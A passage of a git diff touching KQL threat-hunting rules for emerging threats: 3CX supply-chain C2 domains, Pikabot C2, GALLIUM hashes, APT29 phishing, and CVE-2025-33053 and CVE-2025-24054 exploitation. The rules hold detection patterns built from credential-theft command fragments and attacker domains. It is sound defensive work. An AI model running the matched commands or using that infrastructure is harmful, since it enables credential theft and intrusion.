RemoteUrl contains "dunamistrd.com" or RemoteUrl contains "glcloudservice.com" or RemoteUrl contains "journalide.org" or RemoteUrl contains "msedgepackageinfo.com" or RemoteUrl contains "msstorageazure.com" or RemoteUrl contains "msstorageboxes.com" or RemoteUrl contains "officeaddons.com" or RemoteUrl contains "officestoragebox.com" or RemoteUrl contains "pbxcloudeservices.com" or RemoteUrl contains "pbxphonenetwork.com" or RemoteUrl contains "pbxsources.com" or RemoteUrl contains "qwepoi123098.com" or RemoteUrl contains "sbmsa.wiki" or RemoteUrl contains "sourceslabs.com" or RemoteUrl contains "visualstudiofactory.com" or RemoteUrl contains "zacharryblogs.com") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql index 2fdaa157..ac7eaece 100644 --- a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql +++ b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql @@ -1,10 +1,10 @@ -// Title: Potential CSharp Streamer RAT Loading .NET Executable Image -// Author: Luca Di Bartolomeo -// Date: 2024-06-22 -// Level: high -// Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats - -DeviceImageLoadEvents +// Title: Potential CSharp Streamer RAT Loading .NET Executable Image +// Author: Luca Di Bartolomeo +// Date: 2024-06-22 +// Level: high +// Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats + +DeviceImageLoadEvents | where FolderPath matches regex "\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql index b15a1eeb..da63671e 100644 --- a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql +++ b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql @@ -1,12 +1,12 @@ -// Title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-06-13 -// Level: high -// Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053 -// by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from -// attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053 - -DeviceImageLoadEvents +// Title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-13 +// Level: high +// Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053 +// by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from +// attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053 + +DeviceImageLoadEvents | where (InitiatingProcessFolderPath endswith "\\route.exe" or InitiatingProcessFolderPath endswith "\\netsh.exe" or InitiatingProcessFolderPath endswith "\\makecab.exe" or InitiatingProcessFolderPath endswith "\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\ipconfig.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and (InitiatingProcessFolderPath contains "\\DavWWWRoot\\" and InitiatingProcessFolderPath startswith "\\\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql index d3f51ba4..eb026653 100644 --- a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql +++ b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql @@ -1,13 +1,13 @@ -// Title: Potential Pikabot C2 Activity -// Author: Andreas Braathen (mnemonic.io) -// Date: 2023-10-27 -// Level: high -// Description: Detects the execution of rundll32 that leads to an external network connection. -// The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1573, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceNetworkEvents +// Title: Potential Pikabot C2 Activity +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-10-27 +// Level: high +// Description: Detects the execution of rundll32 that leads to an external network connection. +// The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1573, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceNetworkEvents | where (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\sndvol.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wwahost.exe") and InitiatingProcessParentFileName =~ "rundll32.exe" and Protocol =~ "tcp" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql b/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql index 2f1ab35c..29aeaaab 100644 --- a/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql +++ b/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql @@ -1,10 +1,10 @@ -// Title: Potential Suspicious Child Process Of 3CXDesktopApp -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-29 -// Level: high -// Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Suspicious Child Process Of 3CXDesktopApp +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-29 +// Level: high +// Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql b/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql index e22882e2..2016ec13 100644 --- a/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql +++ b/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql @@ -1,10 +1,10 @@ -// Title: GALLIUM IOCs -// Author: Tim Burrell -// Date: 2020-02-07 -// Level: high -// Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.command-and-control, attack.t1212, attack.t1071, attack.g0093, detection.emerging-threats - -DeviceProcessEvents +// Title: GALLIUM IOCs +// Author: Tim Burrell +// Date: 2020-02-07 +// Level: high +// Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.command-and-control, attack.t1212, attack.t1071, attack.g0093, detection.emerging-threats + +DeviceProcessEvents | where (SHA256 startswith "9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd" or SHA256 startswith "7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b" or SHA256 startswith "657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5" or SHA256 startswith "2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29" or SHA256 startswith "52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77" or SHA256 startswith "a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3" or SHA256 startswith "5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022" or SHA256 startswith "6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883" or SHA256 startswith "3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e" or SHA256 startswith "1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7" or SHA256 startswith "fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1" or SHA256 startswith "7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c" or SHA256 startswith "178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945" or SHA256 startswith "51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9" or SHA256 startswith "889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79" or SHA256 startswith "332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf" or SHA256 startswith "44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08" or SHA256 startswith "63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef" or SHA256 startswith "056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070") or (SHA1 startswith "53a44c2396d15c3a03723fa5e5db54cafd527635" or SHA1 startswith "9c5e496921e3bc882dc40694f1dcc3746a75db19" or SHA1 startswith "aeb573accfd95758550cf30bf04f389a92922844" or SHA1 startswith "79ef78a797403a4ed1a616c68e07fff868a8650a" or SHA1 startswith "4f6f38b4cec35e895d91c052b1f5a83d665c2196" or SHA1 startswith "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" or SHA1 startswith "e841a63e47361a572db9a7334af459ddca11347a" or SHA1 startswith "c28f606df28a9bc8df75a4d5e5837fc5522dd34d" or SHA1 startswith "2e94b305d6812a9f96e6781c888e48c7fb157b6b" or SHA1 startswith "dd44133716b8a241957b912fa6a02efde3ce3025" or SHA1 startswith "8793bf166cb89eb55f0593404e4e933ab605e803" or SHA1 startswith "a39b57032dbb2335499a51e13470a7cd5d86b138" or SHA1 startswith "41cc2b15c662bc001c0eb92f6cc222934f0beeea" or SHA1 startswith "d209430d6af54792371174e70e27dd11d3def7a7" or SHA1 startswith "1c6452026c56efd2c94cea7e0f671eb55515edb0" or SHA1 startswith "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" or SHA1 startswith "4923d460e22fbbf165bbbaba168e5a46b8157d9f" or SHA1 startswith "f201504bd96e81d0d350c3a8332593ee1c9e09de" or SHA1 startswith "ddd2db1127632a2a52943a2fe516a2e7d05d70d2") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql b/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql index 5e586028..047815fc 100644 --- a/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql +++ b/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential Russian APT Credential Theft Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2019-02-21 -// Level: critical -// Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.001, attack.t1003.003, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Russian APT Credential Theft Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-21 +// Level: critical +// Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001, attack.t1003.003, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "adexplorer -snapshot \"\" c:\\users\\" and ProcessCommandLine contains "\\downloads\\" and ProcessCommandLine contains ".snp") or (ProcessCommandLine contains "xcopy /S /E /C /Q /H \\\\" and ProcessCommandLine contains "\\sysvol\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql index 83b98d03..1e7d290c 100644 --- a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql +++ b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql @@ -1,14 +1,14 @@ -// Title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit -// Author: Gene Kazimiarovich -// Date: 2025-04-20 -// Level: medium -// Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction. -// If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker. -// MITRE Tactic: Credential Access -// Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054 -// False Positives: -// - Legitimate Library shortcuts under %APPDATA%\Microsoft\Windows\Libraries\ (rarely created by end-users) -// - Custom corporate scripts that programmatically generate .library-ms Files - -DeviceFileEvents +// Title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit +// Author: Gene Kazimiarovich +// Date: 2025-04-20 +// Level: medium +// Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction. +// If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker. +// MITRE Tactic: Credential Access +// Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054 +// False Positives: +// - Legitimate Library shortcuts under %APPDATA%\Microsoft\Windows\Libraries\ (rarely created by end-users) +// - Custom corporate scripts that programmatically generate .library-ms Files + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\7z.exe" or InitiatingProcessFolderPath endswith "\\winrar.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and FolderPath endswith ".library-ms" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql index d120fd91..19465ea3 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql @@ -1,12 +1,12 @@ -// Title: APT29 2018 Phishing Campaign CommandLine Indicators -// Author: Florian Roth (Nextron Systems), @41thexplorer -// Date: 2018-11-20 -// Level: critical -// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: APT29 2018 Phishing Campaign CommandLine Indicators +// Author: Florian Roth (Nextron Systems), @41thexplorer +// Date: 2018-11-20 +// Level: critical +// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "-noni -ep bypass $" or (ProcessCommandLine contains "cyzfc.dat," and ProcessCommandLine contains "PointFunctionCall") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql index c6dc5a5b..8f93e799 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql @@ -1,12 +1,12 @@ -// Title: APT29 2018 Phishing Campaign File Indicators -// Author: @41thexplorer -// Date: 2018-11-20 -// Level: critical -// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: APT29 2018 Phishing Campaign File Indicators +// Author: @41thexplorer +// Date: 2018-11-20 +// Level: critical +// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath contains "ds7002.lnk" or FolderPath contains "ds7002.pdf" or FolderPath contains "ds7002.zip" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql b/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql index dc1d9e6f..18e571bf 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql @@ -1,12 +1,12 @@ -// Title: APT PRIVATELOG Image Load Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2021-09-07 -// Level: high -// Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, detection.emerging-threats -// False Positives: -// - Rarely observed - -DeviceImageLoadEvents +// Title: APT PRIVATELOG Image Load Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-09-07 +// Level: high +// Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, detection.emerging-threats +// False Positives: +// - Rarely observed + +DeviceImageLoadEvents | where FolderPath endswith "\\clfsw32.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql index f34a9bcb..44aba9ba 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql @@ -1,10 +1,10 @@ -// Title: Blue Mockingbird - Registry -// Author: Trent Liffick (@tliffick) -// Date: 2020-05-14 -// Level: high -// Description: Attempts to detect system changes made by Blue Mockingbird -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.t1112, attack.t1047, detection.emerging-threats - -DeviceRegistryEvents +// Title: Blue Mockingbird - Registry +// Author: Trent Liffick (@tliffick) +// Date: 2020-05-14 +// Level: high +// Description: Attempts to detect system changes made by Blue Mockingbird +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.t1112, attack.t1047, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql index abe0487c..8a21aa8a 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql @@ -1,12 +1,12 @@ -// Title: Diamond Sleet APT DLL Sideloading Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-24 -// Level: high -// Description: Detects DLL sideloading activity seen used by Diamond Sleet APT -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Diamond Sleet APT DLL Sideloading Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects DLL sideloading activity seen used by Diamond Sleet APT +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where (FolderPath endswith ":\\ProgramData\\Version.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\clip.exe") or (FolderPath endswith ":\\ProgramData\\DSROLE.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\wsmprovhost.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql index 9993a698..0692f2c2 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql @@ -1,10 +1,10 @@ -// Title: Diamond Sleet APT Scheduled Task Creation - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-24 -// Level: high -// Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats - -DeviceRegistryEvents +// Title: Diamond Sleet APT Scheduled Task Creation - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Windows TeamCity Settings User Interface" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql b/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql index 7c11ad3e..3df96209 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql @@ -1,10 +1,10 @@ -// Title: DLL Names Used By SVR For GraphicalProton Backdoor -// Author: CISA -// Date: 2023-12-18 -// Level: medium -// Description: Hunts known SVR-specific DLL names. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats - -DeviceImageLoadEvents +// Title: DLL Names Used By SVR For GraphicalProton Backdoor +// Author: CISA +// Date: 2023-12-18 +// Level: medium +// Description: Hunts known SVR-specific DLL names. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats + +DeviceImageLoadEvents | where FolderPath endswith "\\AclNumsInvertHost.dll" or FolderPath endswith "\\AddressResourcesSpec.dll" or FolderPath endswith "\\BlendMonitorStringBuild.dll" or FolderPath endswith "\\ChildPaletteConnected.dll" or FolderPath endswith "\\DeregisterSeekUsers.dll" or FolderPath endswith "\\HandleFrequencyAll.dll" or FolderPath endswith "\\HardSwapColor.dll" or FolderPath endswith "\\LengthInMemoryActivate.dll" or FolderPath endswith "\\ModeBitmapNumericAnimate.dll" or FolderPath endswith "\\ModeFolderSignMove.dll" or FolderPath endswith "\\ParametersNamesPopup.dll" or FolderPath endswith "\\PerformanceCaptionApi.dll" or FolderPath endswith "\\ScrollbarHandleGet.dll" or FolderPath endswith "\\UnregisterAncestorAppendAuto.dll" or FolderPath endswith "\\WowIcmpRemoveReg.dll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql b/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql index df167168..89bb9933 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql @@ -1,12 +1,12 @@ -// Title: Equation Group DLL_U Export Function Load -// Author: Florian Roth (Nextron Systems) -// Date: 2019-03-04 -// Level: critical -// Description: Detects a specific export function name used by one of EquationGroup tools -// MITRE Tactic: Defense Evasion -// Tags: attack.g0020, attack.defense-evasion, attack.t1218.011, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Equation Group DLL_U Export Function Load +// Author: Florian Roth (Nextron Systems) +// Date: 2019-03-04 +// Level: critical +// Description: Detects a specific export function name used by one of EquationGroup tools +// MITRE Tactic: Defense Evasion +// Tags: attack.g0020, attack.defense-evasion, attack.t1218.011, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "-export dll_u" or (ProcessCommandLine endswith ",dll_u" or ProcessCommandLine endswith " dll_u") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql b/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql index cd9f3032..6799014d 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql @@ -1,10 +1,10 @@ -// Title: EvilNum APT Golden Chickens Deployment Via OCX Files -// Author: Florian Roth (Nextron Systems) -// Date: 2020-07-10 -// Level: critical -// Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats - -DeviceProcessEvents +// Title: EvilNum APT Golden Chickens Deployment Via OCX Files +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-10 +// Level: critical +// Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "/s" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "\\AppData\\Roaming\\" and ProcessCommandLine contains ".ocx" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql b/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql index e4f65936..a9ffd5af 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql @@ -1,10 +1,10 @@ -// Title: Exploit for CVE-2015-1641 -// Author: Florian Roth (Nextron Systems) -// Date: 2018-02-22 -// Level: critical -// Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.005, cve.2015-1641, detection.emerging-threats - -DeviceProcessEvents +// Title: Exploit for CVE-2015-1641 +// Author: Florian Roth (Nextron Systems) +// Date: 2018-02-22 +// Level: critical +// Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005, cve.2015-1641, detection.emerging-threats + +DeviceProcessEvents | where FolderPath endswith "\\MicroScMgmt.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/Defense 